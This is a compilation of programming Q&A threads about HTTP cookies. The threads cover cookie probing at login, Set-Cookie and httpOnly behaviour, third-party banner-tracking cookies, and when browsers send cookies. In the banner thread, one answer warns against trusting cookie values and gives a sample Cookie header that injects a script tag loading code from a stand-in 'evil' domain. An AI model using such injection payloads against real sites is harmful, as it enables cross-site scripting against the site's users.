question about cookie - cookies

I'm stuck in a cookie related question. I want to write a program that can automate download the attachments of this forum. So I should maintain the cookies this site send to me. When I send a GET request in my program to the login page, I got the cookie such as Set-Cookie: sso_sid=0589a967; domain=.it168.com in my program. Now if I use a cookie viewer such as cookie monster and send the same GET request, my program get the same result, but the cookie viewer shows that the site also send me two cookies which are:
testcookie http://get2know.it/myimages/2009-12-27_072438.jpg and token http://get2know.it/myimages/2009-12-27_072442.jpg
My question is: Where did the two cookie came from? Why they did not show in my program?
Thanks.

Your best bet to figure out screen-scraping problems like this one is to use Fiddler. Using Fiddler, you can compare exactly what is going over the wire in your app vs. when accessing the site from a browser. I suspect you'll see some difference between headers sent by your app vs. headers sent by the browser-- this will likley account for the difference you're seeing.
Next, you can do one of two things:
change your app to send exactly the headers that the browser does (and, if you do this, you should get exactly the response that a real browser gets).
using Fiddler's "request builder" feature, start removing headers one by one and re-issuing the request. At some point, you'll remove a header which makes the response not match the response you're looking for. That means that header is required. Continue for all other headers until you have a list of headers that are required by the site to yield the response you want.
Personally, I like option #2 since it requires a minimum amount of header-setting code, although it's harder initially to figure out which headers the site requires.
On your actual question of why you're seeing 2 cookies, only the diagnosis above will tell you for sure, but I suspect it may have to do with the mechanism that some sites use to detect clients who don't accept cookies. On the first request in a session, many sites will "probe" a client to see if the client accepts cookies. Typically they'll do this:
if the request doesn't have a cookie on it, the site will redirect the client to a special "cookie setting" URL.
The redirect response, in addition to having a Location: header which does the redirect, will also return a Set-Cookie header to set the cookie. The redirect will typically contain the original URL as a query string parameter.
The server-side handler for the "cookie setter" page will then look at the incoming cookie. If it's blank, this means that the user's browser is set to not accept cookies, and the site will typically redirect the user to a "sorry, you must use cookies to use this site" page.
If, however, there is a cookie header send to the "cookie setter" URL, then the client does in fact accept cookies, and the handler will simply redirect the client back to the original URL.
The original URL, once you move on to the next page, may add an additional cookie (e.g. for a login token).
Anyway, that's one way you could end up with two cookies. Only diagnosis with Fiddler (or a similar tool) will tell you for sure, though.

Related

Why cookies appear in request header but not response header when visiting a new website?

This is a incognito window in chrome visiting oracle. Please notice that the request header already has cookie in the very request.
I also tried to use GuzzleHttp in php and postman. I can't get the cookie from anywhere.
Actually I am trying to crawl some other website, and that website has the same problem. I can't get the cookie so I got rejected.
Isn't cookie something that the server returns to the browser? Why in this case it is like the browse know the cookie in the first?
Http cookies are set once in a response by the server (with a Set-Cookie header), then they are included by the browser in each applicable subsequent request.
So it is perfectly normal that cookies your browser already obtained are present in the request but not in the response.
Cookies may also be set on browser side by Javascript, but that also can't happen before the first request (to at least retrieve that Javascript).

Can I set a cookie in this situation?

I want to post a banner ad on a.com, for this to happen, a.com has to query b.com for the banner url via jsonp. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purpose.
I have no control of a.com, so I cannot write any client side JS or ask them to include any external js files. I can only expose a query url on b.com for a.com's programmer to query
I have total control of b.com and c.com
When a.com receives the banner url via JSONP, it will insert the banner dynamically into its DOM for displaying purpose
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevents c.com to set any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these
cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some
firewalls. These can be restrictions in per-cookie length, length
of sum of cookies per domain, or just number of cookies. I've
encountered a firewall that allowed a certain number of bytes in
Cookie: request headers and dropped all Cookie: headers beyond
that size. Some older mobile devices have very small limits on cookie
size.
Cookies are editable by the user and can be tampered with by
men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against
replay attacks unless you
include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Is there any easy way to output a 3rd user-agent of a web-spider?

I am wondering is there any public service that can check the useragent on another server.
For example, I can ask Facebook to parse my website and Facebook will use a UA with a "facebookexternalhit" string in it. To see it I have to prepare somecode on the server side, logged it somewhere.
Is there any easier way or service that I can do it without my own server?
Thanks,
Could it be that you're thinking of the "Referer" HTTP header field, rather than the user-agent?
When I looked at linkis.com functionality, it seemed to be a URL shortener that puts a customized frame on the page, so the visits to the third party site will always be the actual end user, not a bot/spider. The only way you'll know the visit originated from the linkis.com link will be if the user's browser sends the Referer header, which is not guaranteed by the way.
Separately, http://www.user-agents.org/ does not list anything for linkis.com, but it's a useful reference for other user-agent strings.

Set-Cookie for a login system

I've run into a few problems with setting cookies, and based on the reading I've done, this should work, so I'm probably missing something important.
This situation:
Previously I received responses from my API and used JavaScript to save them as cookies, but then I found that using the set-cookie response header is more secure in a lot of situations.
I have 2 cookies: "nuser" (contains a username) and key (contains a session key). nuser shouldn't be httpOnly so that JavaScript can access it. Key should be httpOnly to prevent rogue scripts from stealing a user's session. Also, any request from the client to my API should contain the cookies.
The log-in request
Here's my current implementation: I make a request to my login api at localhost:8080/login/login (keep in mind that the web-client is hosted on localhost:80, but based on what I've read, port numbers shouldn't matter for cookies)
First the web-browser will make an OPTIONS request to confirm that all the headers are allowed. I've made sure that the server response includes access-control-allow-credentials to alert the browser that it's okay to store cookies.
Once it's received the OPTIONS request, the browser makes the actual POST request to the login API. It sends back the set-cookie header and everything looks good at this point.
The Problems
This set-up yields 2 problems. Firstly, though the nuser cookie is not httpOnly, I don't seem to be able to access it via JavaScript. I'm able to see nuser in my browser's cookie option menu, but document.cookie yeilds "".
Secondly, the browser seems to only place the Cookie request header in requests to the exact same API (the login API):
But, if I do a request to a different API that's still on my localhost server, the cookie header isn't present:
Oh, and this returns a 406 just because my server is currently configured to do that if the user isn't validated. I know that this should probably be 403, but the thing to focus on in this image is the fact that the "cookie" header isn't included among the request headers.
So, I've explained my implementation based on my current understanding of cookies, but I'm obviously missing something. Posting exactly what the request and response headers should look like for each task would be greatly appreciated. Thanks.
Okay, still not exactly what was causing the problem with this specific case, but I updated my localhost:80 server to accept api requests, then do a subsequent request to localhost:8080 to get the proper information. Because the set-cookie header is being set by localhost:80 (the client's origin), everything worked fine. From my reading before, I thought that ports didn't matter, but apparently they do.

Does every web request send the browser cookies?

Does every web request send the browser's cookies?
I'm not talking page views, but a request for an image, .js file, etc.
Update
If a web page has 50 elements, that is 50 requests. Why would it send the SAME cookie(s) for each request, doesn't it cache or know it already has it?
Yes, as long as the URL requested is within the same domain and path defined in the cookie (and all of the other restrictions -- secure, httponly, not expired, etc) hold, then the cookie will be sent for every request.
As others have said, if the cookie's host, path, etc. restrictions are met, it'll be sent, 50 times.
But you also asked why: because cookies are an HTTP feature, and HTTP is stateless. HTTP is designed to work without the server storing any state between requests.
In fact, the server doesn't have a solid way of recognizing which user is sending a given request; there could be a thousand users behind a single web proxy (and thus IP address). If the cookies were not sent every request, the server would have no way to know which user is requesting whatever resource.
Finally, the browser has no clue if the server needs the cookies or not, it just knows the server instructed it to send the cookie for any request to foo.com, so it does so. Sometimes images need them (e.g., dynamically-generated per-user), sometimes not, but the browser can't tell.
Yes. Every request sends the cookies that belong to the same domain. They're not cached as HTTP is stateless, what means every request must be enough for the server to figure out what to do with it. Say you have images that are only accessible by certain users; you must send your auth cookie with every one of those 50 requests, so the server knows it's you and not someone else, or a guest, among the pool of requests it's getting.
Having said that, cookies might not be sent given other restrictions mentioned in the other responses, such as HTTPS setting, path or domain. Especially there, an important thing to notice: cookies are not shared between domains. That helps with reducing the size of HTTP calls for static files, such as the images and scripts you mentioned.
Example: you have 4 cookies at www.stackoverflow.com; if you make a request to www.stackoverflow.com/images/logo.png, all those 4 cookies will be sent.
However, if you request stackoverflow.com/images/logo.png (notice the subdomain change) or images.stackoverflow.com/logo.png, those 4 cookies won't be present - but maybe those related to these domains will.
You can read more about cookies and images requesting, for example, at this StackOverflow Blog Post.
No. Not every request sends the cookies. It depends on the cookie configuration and client-server connection.
For example, if your cookie's secure option is set to true then it must be transmitted over a secure HTTPS connection. Means when you see that website with HTTP protocol then these cookies won't be sent by browsers as the secure flag is true.
3 years have passed
There's another reason why a browser wouldn't send cookies. You can add a crossOrigin attribute to your <script> tag, and the value to "anonymous". This will prevent cookies to be sent to the destination server. 99.9% of the time, your javascripts are static files, and you don't generate that js code based on the request's cookies. If you have 1KB of cookies, and you have 200 resources on your page, then your user is uploading 200KB, and that might take some time on 3G and have zero effect on the result page. Visit HTML attribute: crossorigin for reference.
Cookie has a "path" property. If "path=/" , the answer is Yes.
I know this is an old thread. But I've just noticed that most browsers won't sent cookies for a domain if you add a trailing dot. For example http://example.com. won't receive cookies set for .example.com. Apache on the other hand treats them as the same host. I find this useful to make cross domain tracking more difficult for external resources I include, but you could also use it for performance reasons. Note this brakes validation of https certificates. I've run a few tests using browsershots and my own devices. The hack works on almost all browsers except for safari (mobile and desktop), which will include cookies in the request.
Short answer is Yes. The below lines are from the JS documentation
Cookies were once used for general client-side storage. While this was legitimate when they were the only way to store data on the client, it is now recommended to use modern storage APIs. Cookies are sent with every request, so they can worsen performance (especially for mobile data connections).